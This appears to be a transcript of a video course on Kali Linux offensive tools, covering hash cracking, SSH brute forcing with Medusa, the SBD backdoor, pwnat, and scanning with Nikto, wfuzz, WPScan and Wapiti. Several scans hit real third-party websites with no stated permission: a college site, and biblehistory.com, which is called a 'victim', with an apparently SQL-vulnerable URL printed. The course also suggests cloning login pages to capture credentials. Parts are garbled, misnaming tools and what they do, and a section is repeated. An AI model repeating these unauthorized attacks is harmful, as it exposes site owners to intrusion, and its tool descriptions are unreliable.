Welcome, in this video you will see John the Ripper. John the Ripper is a free password cracking software tool initially developed for Unix operating system. It now runs on 15 different platforms. It is one of the most popular password testing and breaking programs as it combines a number of password cracker into one package, auto-detects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats, including several crypt password hash types, most commonly found on various Unix versions. Now let's see John the Ripper in practical. First, go to Google and type password to hash file converter online. Click on this website, that is hashonlineconvert.com. The website has loaded up. Now open Linux and go to application. Select John, that is John the Ripper. Then type locate rocu.txt, which will locate the rocu file. You get user share word list, and inside that rocu.txt.gz. Go to location which came and extract the rocu file. Right click and go to Archive Manager, press select, then press extract. After extract, open the rocu file. Here you can see the list of password available here. I will take the password and paste it in the website, that is hashonlineconvert.com, and I will convert password to a hash and copy that hash word. Open Leafpad and paste and save on desktop. Then go to John terminal and type John format equals to raw-md5 space the location of rocu where you had extracted, that is user share word list rocu.txt, and then the hash location root desktop hash and press enter. Here you can see the result is password. So in this way John the Ripper has identified the hashed word or encrypted hashed word is password, which we had converted. So in this way John the Ripper identifies hashes. It's pretty much important tool because website does stores password into hashes. So that's all in this video on John the Ripper. Thank you for watching this video. Welcome, in this video we are going to learn Find My Hash package and GPB decrypt package in Linux. Find My Hash, it tries to crack different type of hashes using free online services. Accepted algorithms are MD4 RFS 1320, MD5 RFS 1321, SHA1, SHA224, SHA256, 384 and so on, which you can see here. It is from MD4 to LDAP SHA1, all it has. The basic syntax is find my hash, algorithm, options, hash code. Here I'll give you some example which you can try. This is find my hash MD4-H, that hash code, and same for MD5 and its hash code, and so on. Let us do some practical. Let's open up the terminal and type find my hash. Here you can see that different options. Let's see some basic example. Let's try on Juniper hash code algorithm. Find my hash Juniper-H inside double quotation $9 $LBHX WG4Z. You can see that hash was cracked as ls. Now let's try on MD5 code algorithm. Type find my hash MD5-H hash code. It will take analyze your different website. You can see that the hash code cracked as test. Let's check in the website md5online.org. Paste here we can see hash code decrypted as test. Both are same. Now let's learn gpp decrypt command, a simple Ruby script that will decrypt a given gpp encrypted string. Let's open up terminal and type gpp decrypt group policy preferences decryptor. Here I saved encrypted data. Let's copy it. Type gpp decrypt, paste it here. You can see that the code is decrypted as local *p4ssword. So that's it in this video in Find My Hash package in Linux. Thank you for watching this video. Welcome. In this video we will see Medusa Network Brute Force Linux. Medusa, an open source software password auditing tool for Linux that will put all of your organization's password to the test. Bad passwords can have catastrophic consequences. That's because passwords play a key role in enterprise security, protecting assets, including email system, databases, and many other types of servers from unauthorized users. A bad password has one of the following three characteristics. It can easily be guessed, it is likely to appear in a word list, it can be brute forced in reasonable amount of time. Easily guessed, people behave remarkably similar when choosing the password and certain ones crop up again and again. Word list. After a hacker has tried obvious password like 123456 and password, he'll often work his way through a list of possible passwords contained in a word list. Word lists typically contain words found in a dictionary, popular names, and more comprehensive ones that contain combination of words. Such as I love you, words and number such as money 123, and words with common numeric substitution such as M0, N3Y, password using upper and lower case characters, made up of random characters D5 J star DJ semicolon R question mark hyphen F3Y, combinations of multiple words or words combined with punctuations are unlikely to appear in word list. Brute forcing. The only certain way for a hacker to find a correct password is to try every possibility until he gets lucky. A process called brute forcing. 1, 2 or 3 character password can be brute forced quite quickly, but as the password length increases, the chances of successfully brute forcing a password become vanishingly small. Medusa. Medusa is command line only tool, so using this open source software is a matter of building up an instruction from the command line. Let's imagine we want Medusa to connect to a network router that IP address 192.168.1.1 using the default username admin to test how easy it would be to find the password. To do this, we will use the word list huge word list.txt. Since we know that router administrator has a dog called Fido and two children called Alice and Bob, it's worth adding this name to beginning of the huge wordlist.txt file, along with the company name and top 10 password from rockU.txt. To use Medusa, the following must be specified: the host 192.168.1.1 to connect to using the -h switch, username admin to connect with using the -u switch, the name of text file containing the list of password to try using the -p switch, the module to use for the service we are contacting using the -m switch. Let's open up the terminal. Let's type Medusa space -h. So these are the basic usage: Medusa -h, that is host, -u for username, -p for the password, and so on. Basic options such as -h text target host name or IP address, -h file containing target host names or IP addresses, and so on. Let's start Medusa tool. Medusa -h 192.168.154.131 space -u root -p root desktop password.txt space -m ssh. You can see that password.txt file has list of passwords. Process is going on. Our victim machine is Metasploitable 2 machine. Here you can see that the IP address 192.168.154.131. Here you can see that no password is match root user. Let's try with MSF admin. Type medusa -h 192.168.154.131 space -u msf admin space -p root desktop password.txt -m ssh. Click on enter. Here you can see that password is matched with MSF admin user, password also MSF admin. That's it in this video on Medusa network brute forcer in Linux. Thank you for watching this video. Welcome. In this video we are going to learn pwnat, which is maintaining access tool in Linux. pwnat, pronounced as PWNAT, is a tool that allows any number of clients behind NATs to communicate with server behind a separate NAT with no port forwarding and no TMZ setup on any routers in order to directly communicate with each other. The server does not need to know anything about the clients trying to connect. Simply put, this is a proxy server that works behind a NAT even when the client is behind a NAT without any third party. Let's open a terminal and type pwnat space -h NAT to NAT client server communication. Basic syntax for pwnat tool is pwnat -s -c arguments. We can see that the options for pwnat tool -c client mode by default, arguments local port, proxy port, TRF 2222, remote host, remote port, -s server mode, and so on. On the server, run in server mode -s on port 8080. So type pwnat -s 8080. Here you can see that it is listening on UDP 0.0.0 8080 port. Let's open up another terminal. For on the client, run in the client mode -c on local port 8000. Connect to the server IP 127.0.0.1 on port 8080 and use it to connect to google.com on port 80. So type pwnat -c 8080 127.0.0.1 8080 google.com 80. Here you can see that listening UDP 0.0.0 8080. Get packet from 127.0.0.1. Got connection request from 127.0.0.1 and so on. So that's it in this video on pwnat, which is maintaining access tool in Linux. Thank you for watching this video. Welcome, in this video you'll see tools that Kali uses to maintain connection and for access to a hacked machine even when it connects and disconnects again. That is Kali Linux maintaining access. Metasploit. This is a tool that is for Windows machine. It has PowerShell installed in victim's machine. This tool helps the hacker to connect with the victim's machine via PowerShell. Usage. Refer to the command-based help in each individual script for detailed usage information. To install this module, drop the entire Metasploit folder into one of your module directories. The default PowerShell module paths are listed in the environment ps module path environment variable. The default per user module path is environment home drive, environment home path documents, Windows PowerShell modules. The default computer level module path is environment win directory, that is Windows directory system32 Windows PowerShell v1.0 modules. To use the module, type import module Metasploit. To see the commands imported, type get command module Metasploit. If you are running PowerShell v3 and you want to remove the annoying "do you really want to run the scripts downloaded from the internet" warning, once you place the Metasploit into your module path, run the following one-liner, that is environment ps module path dot split semicolon percentage if test path join path Metasploit get child item, that is recurse or unblock file. For help on each individual command, use get-help. Note, the tools contained within this module were all designed such that they can be run individually. Including them is the module simply lends itself to increase portability. And they do have contribution rule if you want to improve the software for them. Open the terminal and type change directory to user shared Metasploit. If you type ls, it will list all the Metasploit tools that you can download and install in the victim's machine after you have gained access. Most of them are named self-explained according to their names. Type python-m simple HTTP server. So that's all in Metasploit Kali Linux maintaining access. Thank you for watching this video. Welcome, in this video we will see SBD Kali Linux maintaining access. SBD is a tool similar to Netcat. It is portable, can be used in Linux and Microsoft machine. SBD features AES CBC 128 plus HMAC SHA1 encryption. Basically, it helps to connect to a victim's machine anytime on specific port and send commands remotely. Go to terminal and type SBD space -h. Here we can see that different options are available. That is -p for prefix, -v for print version, banner and exit, -m for tool monitoring, -l for listening incoming connection, -p to choose port to listen on, -a for address, choose an address, and so on. Type SPD-L-P port for the server to accept connection. Now let's type SPD IP of server port. A connection will be established where we can send the remote commands. In this case it is localhost since we have performed a test on the same machine. So that's all in this video on SPD Kali Linux maintaining access. Thank you for watching this video. Welcome, in this video we are going to learn Nmap, which is maintaining access tool in Kali Linux. Nmap is a read cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum. If you specify a password file It will automatically attempt to brute force the user accounts when it's finished enumerating. Let's download latest readnm tool. Change the terminal directory to desktop, type cd space desktop, type git clone https github.com trustedese/readnm.git and hit enter. Cloning is started here. Readnm folder is downloaded in desktop. Type cd space readnm. Now let's run the readnm.py, that is Python file. Here we can see that basic usage of readnm tool, that is /readnm.py server underscore IP start underscore RID end underscore RID optional underscore password underscore file optional underscore username underscore file. Let's open up my victim machine as Metasploitable2. Type if config. Here you can see that IP address of Metasploitable2 victim machine 192.168.154.131. Let's connect to the remote server and cycle from RID 500 to 50,000, that is 550,000, using the given password file, that is tmp passes.txt. So type python readnm.py 192.168.154.131 500 5000 root desktop dict.txt root desktop username.txt. Here you can see that it will check with all username and password from dict.txt and username.txt file. If username and password is matched, it will display the username and password. That's it in this video on readnm, which is maintaining access tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn pwnat, which is maintaining access tool in Linux. pwnat, pronounced as PWNAT, is a tool that allows any number of clients behind NATs to communicate with server behind a separate NAT with no port forwarding and no TMZ setup on any routers in order to directly communicate with each other. The server does not need to know anything about the clients trying to connect. Simply put, this is a proxy server that works behind a NAT even when the client is behind a NAT without any third party. Let's open a terminal and type pwnat space -h NAT to NAT client server communication. Basic syntax for pwnat tool is pwnat -s -c arguments. We can see that the options for pwnat tool -c client mode by default, arguments local port, proxy port, trf2222, remote host, remote port, -s server mode, and so on. On the server, run in server mode -s on port 8080. So type pwnat -s 8080. Here you can see that it is listening on UDP 0.0.0 8080 port. Let's open up another terminal. For on the client, run in the client mode -c on local port 8000. Connect to the server IP 127.0.0.1 on port 8080 and use it to connect to google.com on port 80. So type pwnat -c 8080 127.0.0.1 8080 google.com 80. Here you can see that listening UDP 0.0.0 8080. Get packet from 127.0.0.1. Got connection request from 127.0.0.1 and so on. So that's it in this video on pwnat, which is maintaining access tool in Linux. Thank you for watching this video. Welcome, in this video we are going to learn htrack web application tool in Linux. htrack takes any website and makes a copy to your hard drive. This can be useful for searching for data on the website offline, such as email addresses, information useful for social engineering, hidden password files. Believe me, I have found a few intellectual property or maybe replicating a login page for an evil twin site to capture login credentials. htrack is not included in Kali, so we will need to download and install it. Let's open up terminal, type htrack -h. Here you can see that basic usage of htrack, the URL of the site, any options, URL filter, -o location to send copy to. Let's see basic option, O path for mirror or log files plus cache, capital W for mirror website, semi-automatic, and so on. Here you can see some basic example. Let's copy the URL of Bible history, htrack, http biblehistory.com. Copy is completed. Let's open up index file of Bible history. Here you can see that Bible history index page. Using this tool, we can clone any website. That's it in this video. Thank you for watching this video. Welcome, in this video we are going to learn Qt-capt web application in Linux. First let us see what is Qt-capt web application. Qt-capt is a small cross-platform command line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats including SVG, PDF, PS, PNG, JPEG, TIFF, GIF and BMP. So let's see in practical. First open up a terminal and type Qt-capt. It will show the options like help, URL, out format, minimum width, minimum height, max weight, delay, user style path. Then next type Qt-capt -URL equals to http google.com -out equals to google.png. In files it is saved as Google PNG. Then type Qt-capt -URL equals to http google.com out equals to google.html. You can see here google.html has opened. Click on that, google.html has opened. Then next type Qt-capt -URL equals to http facebook.com -out equals to facebook.html. It has saved in file. Click on this. The Facebook file is opened. And next take a capture of the URL and save it to disk. Then open a PDF in files. Here it is showing the Kali info. So that's it in this video on Qt-capt web application in Linux. Thank you for watching this video. Welcome, in this video we are going to learn DIRP package web application in Linux. DIRP is a web content scanner. It looks for existing web objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response. DIRP comes with a set of pre-configured attack word list for easy usage, but you can use your custom word list. Also, DIRP sometimes can be used as a classic CGI scanner, but remember it's a content scanner, not a vulnerability scanner. DIRP main purpose is to help in professional web application auditing, especially in security related testing. It covers some holes not covered by classic web vulnerability scanners. DIRP looks for specific web objects that other generic CGI scanners can't look for. It doesn't search vulnerabilities, nor does it look for web contents that can be vulnerables. Let's open terminal, generate a dictionary from HTML pages, type html2 dic root desktop facebook.html. Here I created one facebook.html web page. Here we can see that list of directories are displayed here. DIRP, a web content scanner. So type DIRP
the basic syntax, ./dirb URL base word list file, and the options. URL base, that is base URL to scan, word list files, list of word files. Here you can see that basic options are -a agent string, specify your custom user agent, -c cookie string, and so on. Let's scan the web server google.com for directories using dictionary file inside user share word list dirb common.txt. So for that I will type dirb space https google.com space user share word list dirb common.txt. So let's open up common.txt file. Here you can see that commonly names directory files. Hit on enter. Here you can see that it will scan with all the common directory names. We can see that directory names are displayed here. It will scan with all 4612 directories. So that's it in this video on DRP package for web application in Linux. Thank you for watching this video.
Welcome. In this video we will see Nikto. Nikto is an open source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6,700 potential dangerous files or programs. It checks for outdated versions of over 1,250 servers and version-specific problems on over 270 servers. To use Nikto, no need to do any kind of installation or anything if you have Linux operating system. Just boot into Linux operating system, open the terminal and type Nikto and hit on enter. The guide related to Nikto will show up. Now let's scan a website using Nikto. Before we begin scanning website using Nikto, take a look at this guide help, where it has mentioned each and every specific feature of a Nikto. For what the config stand, that is use this config file, host, help, list plugins, output, port, root, SSL, timeout, update, version, vhost. Just take a look at it in the brief and you will understand it what that basically mean. Without wasting time, I would like to scan a website using Nikto. In this video, I will scan one college website. I'll just blur here URL of the website because the website belongs to some other college, because I don't want thousands of students to go and do hacking techniques on this website. So to scan a website, I will type Nikto host and the URL http://www.so-and-so website. I'm just blurring out website here. You can try some other website in which you are interested. As the scanning begins, it will show the target IP, target hostname, target port, start time. The server is Apache 2.2.16, retrieved powered by header PHP 5.3.3. Anti-click jacking X-frame option header is not present. If you have no idea what is click jacking, then do watch this course completely. I have covered click jacking. Even the XSS protection header is not defined. XSS is a cross-site scripting vulnerability. Even this I have covered in this course. X content type option header is not set. Apache 2.2.16 appears to be outdated. The current latest one is 2.4.12. Uncommon header TCN. Apache mode negotiation is enabled with multi-views, which allows attackers to easily brute force file names. For that, check this URL. And the following alternatives for index file, that is index.php, is also found. That is also one kind of vulnerability. Web server returns a valid response with junk HTTP methods. This may cause false positives. Debug HTTP verb may show server debugging information. And even you can see here ADM
/config.php may contain database IDs and password. This is really a big blowout for the security of this website. So on, it has listed all kind of directory where you will find interesting information, like you can see /admin, /library, /php admin changelog.php is for managing MySQL database and should be protected, but this one is easily accessible. Cookie sqmse ssid created without the HTTP only flag, and other directory with interesting information are listed here. PHP myadmin directory is also found, and even PHP myadmin database is also found. It should be protected or limited to authorized host, but for this website they have not. And you have to keep in mind that kind of website I have scanned is a college website, so almost all of the websites are not secured. Nikto has sent 8,536 requests. It has got 0 error and 28 items reported on remote host. It basically took 812 seconds to complete the scanning. So basically we have tested one host on Nikto. So that's all. I hope you got to know how much interesting tool is Nikto and how much useful it is for you as a web hacker or bug bounty hunter. That's all. Thank you for watching this video.
Welcome. In this video we are going to learn wfuzz web application in Linux. wfuzz is a tool designed for brute forcing web application. It can be used for finding resources not linked like directories, servlets, scripts, etc. and brute force get and post parameter for checking different kind of injections, that is SQL, XSS, LDAP, etc. Brute force forms parameters, that is user ID or password, fuzzing, etc. Some features: multiple injection points capability with multiple dictionaries, recursion when doing dictionary brute force, post, headers and authentication data brute forcing, output to HTML, colored output, hide result by written code, word numbers, line numbers, regex, cookies fuzzing, multi-threading, proxy support, SOC support, time delays between requests, authentication support, all parameters brute forcing post and get, multiple encoders per payload, payload combination with iterators, baseline request, brute force HTTP methods, multiple proxy support, head scan, dictionaries tailored for known applications like WebLogic, iPlanet, Tomcat, Domino, Oracle, Oracle 9i, Wignet, ColdFusion and many more. Let's open terminal and type wfuzz web application brute forcer. Here you can see that basic usage, user bin wfuzz options space URL. Basic options as -c output with colors, -v verbose information, -o printer, output format by stder, -p address use proxy, -x type use SOC proxy, and so on. Here you can see that basic example of wfuzz. Let's use color output, that is -c, a word list as a payload, -z file, user share wfuzz word list, general, and finally common.txt, and hide 404 message, that is -hc 404 to fuzz the given URL, that is 107.180.54.186 /fuzz. Here you can see that ID response lines and so on requesting datas. So that's it in this video on wfuzz, which is web application tool in Linux. Thank you for watching this video. Welcome, in this video we're going to learn via SQL, which is SQL Vulnerability Scan in Linux. via SQL is Perl or DBI based universal SQL editor running in a shell environment. The application relies on the VI editor to manage SQL queries, query directives, and query variable within a text document. Let's open a browser, search via SQL space GitHub. Click on GitHub black vkng or via SQL scan, SQL vulnerability on target scan. Let's download via sql.zip file. Here I downloaded and extracted zip file saved on desktop. Open up terminal. Type cd space desktop, that is change terminal directory from root to desktop. Let's install via SQL tool. Type python2 space installer.py. Here we can see that via SQL tool is installed successfully. Usage python2 via sql.py -t domain _name. Let's scan the biblehistory.com. Type via sql -t http biblehistory.com. It will scan SQL vulnerability with all the pages. If SQL vulnerability is found, it automatically terminates and reports the SQL vulnerable link. Here we can see that SQL vulnerability found in http biblehistory.com subcat.php id equals to 16. So that's it in this video on VI SQL Scanner. Thank you for watching this video. Welcome, in this video we are going to learn WP Scan web application tool in Linux. WP Scan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues. Let's open up terminal and type WP Scan space -h WordPress vulnerability scanner. Some values are setable in a config file. See the example.conf.json -update to the database to the latest version -URL the WordPress URL or domain to scan forces WP Scan to not check if the remote site is running WordPress. Enumerate does enumeration, and the option usernames from ID 1 to 10, 10 to 20 usernames from ID 10 to 20. You must write square character for characters and so on. Here you can see that some of the basic example. Let's scan a target WordPress URL and enumerate any plugins that are installed. Type WP Scan space -URL hacking2.com. Here you can see that we found 3 plugins: Viewer, -builder, -light version, limit, -login, attempts, and Ninja Forms. So that's it in this video on WP Scan, which is web application tool in Linux. Thank you for watching this video. Welcome, in this video we will see WAP-ITI web application analysis tool in Linux. WAP-ITI allows you to audit the security of your web application. It performs black box scans, that is, it does not study the secure code of application but will scan the web pages of deployed web app, looking for scripts and forms where it can inject data. Once it gets this list, WAP-ITI acts like a fuzzer, injecting payloads to see if a script is vulnerable. Let's start. To open WAP-ITI, go to Application and select Web Application Analysis.
In that, select Web ITI and click on that. It will show you the support options: Web ITI 2.3.0, Web Application Vulnerability Scanner, usage Python Web ITI.py, HTTP server.com base URL options. Supported options are -s URL --start to specify any URLs to start with. This option can be called several times. Web ITI will browse this link to find more URLs even if the specified link is not in the scope. -x, that is to exclude an URL from the scan. This option can be called several times to specify several URLs. Wildcards can be used in URL for basic regex. Example: -x HTTP server base page equals to module equals to test, or -x HTTP server base admin to exclude a directory. -p URL proxy -proxy URL proxy to specify a proxy. Currently supported proxies are HTTP and HTTPS. This option can be called twice to specify HTTP and HTTP proxy. Example: -p HTTP proxy. The next type WAPITI HTTP biblehistory.com. The biblehistory.com is the victim website I am targeting. WAPITI 2.3.0, loading modules, launching module execution, launching module file, launching module SQL, launching module XSS, launching module client SQL, launching module permanent XSS. A report has been generated in the file root/WAPITI generated _report. Open root.wapiti generated report /index.html with the browser to see this report. So this is the report. So that's it in this video on WAPITI Web Application Analysis Tool in Linux. Thank you for watching this video.
Welcome. In this video we will see Burp Suite, which is web application tool in Linux. Burp Suite is an integration of tools that work together to perform security tests on web application. It is also a platform for attacking applications on the web. Burp Suite contains all the Burp Suite interfaces and tools made for speeding up and facilitating the process of application attacks. Every Burp Suite tool contains the same robust framework for extensibility, alerting, logging, upstream proxies, authentication, persistence, and HTTP request. With Burp Suite, you are allowed to combine automated and manual techniques to attack, scan, analyze, exploit, and enumerate applications on the web, just as you learn with this penetration test course. The various tools of a Burp Suite work together seamlessly to allow identified findings and share information within one of the tools to form the foundation of attacks using a different tool. When putting a web application to the test, Burp Suite helps the penetration tester through the process, starting from identifying vulnerabilities all the way to the mapping and exploitation phase. Understanding the framework of Burp Suite will help you know when to use which features with what scenario. Usage: Burp Suite Spider. Burp Suite Spider is a tool for mapping web application. It automates the laborious task of cataloging an application's content and functionality
and lets you work manually via your browser by passively inspecting traffic passing through Burp proxy and cataloging everything it identifies. It actively crawls the application by automatically following the links, submitting forms, and parsing responses for new content. Browse a detailed sitemap of Discord content in tree and table form. Retain full control of all spidering action with fine-grained scope definition, automatic or user-guided submission of forms and detailed configuration of the spidering engine. Send interesting items to other Burp Suite tools with a single click. Deal with complex applications with automatic handling of login credentials and session cookies and detection of custom not found responses. Save all of your work and resume working later. When you run Burp, the spider runs by default in passive mode and builds up a detailed sitemap of your target application. By recording all of the requests that you make via Burp proxy and passing all the responses for new link and functionality, after browsing the whole application, you can use Burp sitemap to review the content you have discovered. You can then use the active spidering function to map out any areas you may have missed, or you can select individual items or branches within the sitemap and send these to other Burp tools for further manual or automated attacks. Comparer. Burp Comparer is one tool that visually compares two different data items. Typically, this requirement arises when you want to identify differences between two responses of applications quickly in the context of application on the web. This tool is used to identify the difference between failed login responses using invalid and valid usernames. It can also be used to identify the difference between two requests for application to received responses in the course of an attack by a Burp intruder, or for when you want to identify the different parameter requests that give rise to varied behavior. Decoder. Burp Decoder is a basic tool that transforms raw data in various hashed and encoded forms and transforms data that has been encoded into a canonical version. With the use of heuristic techniques, it has a capacity of recognizing many different code formats. Sequencer. Burp Sequencer is used to analyze the degree of an application session's tokens, randomness, or other items in which the application's unpredictability is dependent for its security. Repeater. The Burp Repeater used for manually reusing and modifying individual requests of HTTP and making an analysis of the response. This is ideally used together with other tools in Burp Suite. For instance, you can send requests to Repeater from the sitemap target, from the Burp intruder attack result, or from browsing history of Burp proxy. You can then adjust the request manually to probe for vulnerability or to fine-tune an attack. Intruder. Burp Intruder is one of the tools that automates customized attacks versus applications on the web. Scanner. Burp Scanner is a tool that performs automated security discovery of web application vulnerability. It is created for use by penetrating tests to closely fit with the existing methodology and techniques for performing semi-automated and manual penetration tests of applications on the web. Spider. The Burp Spider is a tool for web application mapping. It uses various techniques of intelligence to generate comprehensive inventories of an application's functionality and content. Proxy. Burp Proxy is an HTTP or HTTPS interactive proxy server for testing and attacking applications on the web. It operates as a middleman between the target web server and the end browser. This allowed user to modify, inspect, and intercept the raw traffic that passes in either direction. So that's all in brief about Burp Suite, which is web application tool in Kali Linux. Thank you for watching this video. Welcome. In this video we are going to learn host command for querying DNS lookups in Kali Linux. Host command is minimal and easy to use CLI utility for performing DNS lookups, which translate domain names to IP addresses and vice versa. It can also be used to list and verify various types of DNS records such as NS and MX, test and validate ISP DNS server and internet connectivity, spam and blacklisting records, detecting and troubleshooting DNS server issues, among others. We will learn how to use host command with a few useful examples in Linux to perform DNS lookups. Let's open up terminal, type host space -h, the basic usage of host tool, that is host, -c for class, -n for in dots, -t for type, -w for time, -r for number, -m for flag, and hostname server. The basic options are -a is equivalent to -v space -t any. -c specifies query class for non-IN data. -c compares SOA records on authoritative name servers. -d is equivalent to -v. -l lists all hosts in a domain name using XFR and so on. Let's find the domain IP address. This is the simplest host command you can run. Just provide a domain name such as google.com to get the associated IP addresses. Type host space google.com. Here you can see that Google IP address 216.58.201.46 and google.com IPv6 address 2A001450400980B 200E. Let's find domain name servers. To find out the domain name server, use the -t option. Type -t ns google.com. Here you can see that google.com servers ns1, ns2, ns3, and ns4. Let's find domain SOA records. You can make host attempt to display the SOA records for specified zone from all the listed authoritative name servers for that zone with the -c dot flag. Type host -c google.com. Here you can see that SOA record informations. That's it in this video. Thank you for watching this video. Welcome. In this video we are going to learn trace mobile phone in Kali. IP locator. It is a simple tool coded in Perl to help you to identify sites or victims' geographical location. Without logging in the browser and search, it is capable to find the country, region, city, latitude, longitude, zip code, time zone, connection speed, ISP, domain name, IDD country code, area code, weather station code, and name, mobile carrier, elevation, and usage type information using a proprietary IP address lookup database and technology without invading the internet user's privacy. These are the victim's IP for practice. Let's open up the browser. Here I already opened GitHub IP locator. Let's download the zip file. Here I already extracted in desktop. Now let's open up terminal. Type ls to see the files and directory. Here you see that files and directories. Now select desktop. Type cd desktop. Type ls for see the files and directories in desktop. Here you can see that IP locator displayed. Let's select IP locator master. Type cd IP locator -master. Type ls to see the files and directories in IP locator master folder. Here you can see that files and folders. Now let's run the Perl file. Type Perl IP locator.pl. 192.168.218.38. This address is victim address. You can use any mobile phone address. Here I used my friend address. After pressing enter, if you get error like this can't locate json.pm, you may need to install the JSON module. To install JSON module, type this command, that is sudo cpan json wget http search.cpan.org cpan authors id mmi app-cpanmins 1.5017 tar.gz. Just execute this command. After that, change directory cd app-cpanmins news sudo make install sudo cpanm. Here the Perl program is running successfully. The geolocation, the country is India, city is Belgaum, region Karnataka, geolocation, geolatitude and longitude, time zone, ISP provider, etc. Now let's see the location in Google Map using the longitude and latitude address. Here I opened latlong.net show latitude longitude.html. I will type the value, that is 15.867, which I got as latitude and 74.5 as longitude, and click on convert. Here you can see that address location is displayed. So this is how we trace mobile phone in Kali Linux. That's it in this video. Thank you for watching this video. Welcome. In this video we are going to learn Linux to Mac and Mac to Linux reporting tools in Kali Linux. Linux to Mac command will convert from Unix to Mac. Mac to Unix command will convert from Mac to Unix. So let's begin. Let's open up terminal and type Unix to Mac space -h. Here we can see that basic usage of Unix to Mac command. Usage Unix to Mac, options file -n, in file space out file. Basic options are -a ASCII convert only line breaks, -ISO conversion between DOS and ISO character set, -1252 use Windows code page 1252, -437 use DOS code page 437, and so on. Let's convert Unix text file to Mac text file. Type Unix to Mac -n to create new file, /root desktop username unix.txt, root desktop username mac.txt. You can see that the Mac file format is generated here. Converting file root desktop username unix.txt file to file root desktop username mac.txt in Mac format. Type Mac to Unix space -h. Here you can see that basic usage of Mac to Unix command. Mac to Unix options file -n in file output file. Let's convert Mac text file to Unix text file. Type Mac to Unix space -n root desktop user mac.txt, root desktop unix text.txt. Here you can see that the Mac format text file generated in Unix format, text file as unix text.txt. That's it in this video on Linux to Mac and Mac to Linux reporting tools. Thank you for watching this video. Welcome. In this video we will learn A2SV web hacking tool in Kali Linux. It is an auto scanning tool to find SSL vulnerability and also featured with CCS injection, SSL v3 poodle, heartbleed, etc. Let's open a browser. Here I already opened github.com hhwu1 A2SV and copied link. Let's open up terminal and type git clone, paste the copied git link. cloning is started here. Here we downloaded A2SV tool. Let's change the terminal directory to A2SV. Type cd space A2SV. Let's see the files and directory. Here you can see that all files are executed format. Let's install tool. Type /install.sh. Installation is started. Let's run a2sv.py file. Type python a2sv.py space -h. Basic syntax for a2sv -h -t target and so on. Let's see some basic options for AS2SV tool. -h-help, show this help message and exit. -t target, target URL and IP address, example -t 127.0.0.1, -tf, that is target file, for example -tf ./target.list, and so on. Let's SSL vulnerability scan on biblehistory.com. Type python space a2sv.py -t biblehistory.com. Here you can see that scan with anonymous cipher connection is successful. Scan crime, it include SPDY version less than 4. Scan CCS injection is failure to connecting to Bible history. Let's scan on google.com. Here you can see that scan with anonymous cipher, scan crime, scan CCS injection, heartbleed, scan SSL v3 pull, and so on. Here you can see that final report. We found one exception on SSL v2 drone. That's it in this video on A2SV, which is web hacking tool in Linux. Thank you for watching this video. Welcome, in this video we are going to learn casefile package in Linux. Casefile is little brother to Maltego. It targets a unique market of offline analysts whose primary sources of information are not gained from open source intelligence site or can be programmatically queried. We see these people as investigators and analysts who are working on the ground, getting intelligence from other people in the team and building up an information map of their investigation. Casefile gives the ability to quickly add, link and analyze data having the same graphing flexibility and performance as Maltego without the use of transforms. Casefile is roughly a third of the price of Maltego. First, let's see what does Casefile do. Casefile is a visual intelligence application that can be used to determine relationships and real-world links between hundreds of different types of information. It gives you the ability to quickly view second, third, and nth order relationships and find links otherwise undiscoverable with other type of intelligence tools. Casefile comes bundled with many different types of entities that are commonly used in investigations, allowing you to act quickly and efficiently. Casefile also has the ability to add custom entity types, allowing you to extend the product to your own datasets. What can Casefile do for me? Casefile can be used for information gathering, analytics, and intelligence phases of almost all types of investigate, from IT security, law enforcement, and any data-driven work. It will save you time and will allow you to work more accurately and smarter. Casefile has the ability to visualize datasets stored in CSV, XLS, and XLSX spreadsheet format. Casefile aids you in your thinking process by visually demonstrating interconnected links between searched items. If access to the hidden information determines your success, case file can help you discover it. Case file gives you the ability to quickly add, link, and analyze data having the same graphing flexibility and performance as Maltego without the use of transforms. Let's open the terminal and type case file. We see that case file is loading. It will take few seconds. Maltego case file is opened. Let's create new graph. Here I created one simple graph. We see that plenty option. You can drag and drop and make a graph. I'm dragging PC and Facebook Mark Zuckerberg. I will add link between PC and Facebook Mark Zuckerberg. You can also add label here. I'm ignoring label. Let me add a smartphone now. I'll just link this phone to Mark Zuckerberg. You can label it. I'm just leaving like that. Let me take a look. What all options I have here. I will take this Facebook online group and link it to the Facebook. Now let me link HTC to Facebook group, not just one way, so let me point from Facebook to HTC, or else you can leave like that. Let me take out Latin Kings. I can link it to the Facebook from Latin Kings. We have business leader, businessman, employee. Let me take business leader. It gives the default name, that is John Doe. I'll link John Doe to the PC as he used PC and he used Facebook also. Instead of direct Facebook, we can link it to cell phone. So it means that he used Facebook through PC and cell phone. In tracking, we have bank account, lots of information. We can use to drop down and create a view here to see what all links to what all things. John Doe does meeting. Facebook group can be linked to the meeting. In detailed view, you can see it. If you not did something detailed, so it's not showing up. So this is what all linking you can do from taking all the palette options. So that's all about case file package in Kali Linux. Thank you for watching this video. Welcome. In this video, we'll see Wiki HTML to PDF, which is a web page to PDF converter tool in Kali Linux. Wiki HTML to PDF is an open source, simple and much effective command line shell utility that enables user to convert any given HTML to PDF document or an image. Wiki HTML to PDF is written in C++ programming language and distributed under GNU or GPL, that is General Public License. It uses WebKit rendering layout engine to convert HTML pages to PDF document without losing the quality of the pages. It is really very useful and trustworthy solution for creating and storing snapshots of web pages in real time. Wiki HTML to PDF features open source and cross-platform. Convert any HTML web pages to PDF files using WebKit engine, options to add headers and footers, table of content generation option, provides batch mode conversions, supports for PHP or Python via bindings. So let's start. First open terminal and install wkhtml to PDF. Now type sudo space apt-get install wkhtml to PDF. Here you can see it's installed. Now type wkhtml to PDF space -h to see options, wkhtml to PDF, global option, object output file, document objects, DOC, that is DOC option, description converts one or more HTML page into PDF document using wkhtml to PDF patched, global option, that is collate, no collate copies, reducted functionality. Now type wkhtml to PDF space google.com/root desktop google.pdf. After running this command, it will convert the given web page to google.pdf in current working directory. You can see it started. You can see the PDF file of Google is created in desktop. Let's try on hackingtool.com. Type wkhtml to PDF space hackingtool.com/root desktop hackingtool.pdf. So that's it in this video.
